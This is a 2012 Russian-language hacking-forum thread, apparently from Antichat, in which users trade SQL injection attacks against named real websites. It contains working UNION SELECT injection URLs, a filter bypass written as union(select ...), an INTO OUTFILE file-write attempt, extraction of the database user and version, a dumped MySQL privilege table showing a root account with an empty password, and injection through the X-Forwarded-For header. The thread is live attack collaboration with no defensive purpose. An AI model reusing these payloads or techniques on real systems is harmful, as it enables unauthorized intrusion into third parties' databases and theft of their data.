 |
|
20.12.2012, 18:16
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 12
С нами:
9176038
Репутация:
8
|
|
Сообщение от qwwertty
Ты не прав, скорее всего база пуста.
В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"
В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает
Проверил ещё раз.
Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+
File_Priv=N
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+
|
|
|
20.12.2012, 18:27
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами:
8618274
Репутация:
0
|
|
Сообщение от BigBear
Проверил ещё раз.
Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+
File_Priv=N
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+
И правда, но кое что есть
Data Found: Host:Userassword:Update_priv:Insert_priv:Select_pr iv:Create_user_priv:Grant_privelete_privrop_priv:C reate_priv:File_priv
localhost:root: :Y:Y:Y:Y:Y:Y:Y:Y:N
PS чтото получше sqlihelpera для дампа есть?
|
|
|
|
20.12.2012, 18:35
|
|
Познающий
Регистрация: 06.04.2009
Сообщений: 30
С нами:
8999608
Репутация:
0
|
|
господа, приветствую. Вот sqlmap'ом посотрел список юзеров mysql
там есть помимо прочих и такие:
[*] cacti [1]:
[*] debian-sys-maint [1]:
[*] f2 [1]:
[*] frontend [1]:
[*] replication [1]:
[*] wizard [1]:
есть ли для них дефалтовые пароли? Что это вообще за движок передо мной судя по набору юзеров?
|
|
|
|
20.12.2012, 23:19
|
|
Познающий
Регистрация: 26.10.2012
Сообщений: 54
С нами:
7129046
Репутация:
0
|
|
http://sahyadhri.com/tourism/cities.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14+--+
как обойти блок select ??
|
|
|
|
21.12.2012, 01:36
|
|
Познающий
Регистрация: 06.04.2009
Сообщений: 30
С нами:
8999608
Репутация:
0
|
|
Вопрос знатокам. Если Havij и Sqlmap не справляются, а уязвимость sql-inj есть, есть ли третий вариант?
|
|
|
|
21.12.2012, 01:44
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от kcash
Вопрос знатокам. Если Havij и Sqlmap не справляются, а уязвимость sql-inj есть, есть ли третий вариант?
да. руки и мозг
Сообщение от kcash
господа, приветствую. Вот sqlmap'ом посотрел список юзеров mysql
там есть помимо прочих и такие:[*] cacti [1]:[*] debian-sys-maint [1]:[*] f2 [1]:[*] frontend [1]:[*] replication [1]:[*] wizard [1]:
есть ли для них дефалтовые пароли? Что это вообще за движок передо мной судя по набору юзеров?
какой ещо движок???? ето пароли от майскул базы
|
|
|
|
21.12.2012, 02:09
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
Сообщение от 0xd098d0b3d0
http://sahyadhri.com/tourism/cities.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14+--+
как обойти блок select ??
http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14)+--+
тут фильтрация связки union+select , а не только select
|
|
|
|
21.12.2012, 02:18
|
|
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами:
7167926
Репутация:
20
|
|
Нашел sqli в хттп заголовках X-Forwarded-For:
Когда сделал запрос X-Forwarded-For: ' order by 2# мне ответили:
General Error This account disabled
Потом X-Forwarded-For: ' order by 3# и мне ответили:
General Error SQL ERROR [ mysql4 ] Unknown column '3' in 'order clause' [1054]
Я так понял, что там всего 2 поля...
Но когда вбиваю X-Forwarded-For: ' union select 1,2# мне пишут мол
General Error SQL ERROR [ mysql4 ] Unknown table 's' in field list [1109]
как раскрутить?
|
|
|
|
21.12.2012, 02:26
|
|
Новичок
Регистрация: 26.12.2009
Сообщений: 3
С нами:
8618274
Репутация:
0
|
|
Сообщение от smirk
http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14)+--+
тут фильтрация связки union+select , а не только select
Код:
_ttp://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,%28user%28%29%29,%28version%28%29%29,%28database%28%29%29,5,6,7,8,9,10,11,12,13,14%29+--+
|
|
|
|
21.12.2012, 02:42
|
|
Познающий
Регистрация: 26.10.2012
Сообщений: 54
С нами:
7129046
Репутация:
0
|
|
Код:
http://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,2,3,4,5,6,7,8,9,10,11,12,13,14%29+from+information_schema.tables+--+
А обойти 403 в таком запросе получиться?? |
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
